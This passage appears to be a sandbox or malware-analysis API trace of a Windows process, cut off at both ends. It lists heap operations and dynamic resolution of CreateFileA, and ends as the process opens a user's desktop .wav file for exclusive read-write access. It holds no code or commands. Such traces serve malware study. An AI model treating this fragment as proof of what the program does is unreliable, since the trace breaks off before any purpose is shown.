dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.028] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.028] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.028] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.028] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c760 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.029] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.040] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8896b8 [0031.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8896b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.042] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0031.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8896b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.043] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0031.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0031.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f3630 [0031.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", cchWideChar=73, lpMultiByteStr=0x7f3630, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", lpUsedDefaultChar=0x0) returned 73 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.043] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\evqxht.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.044] RtlAllocateHeap 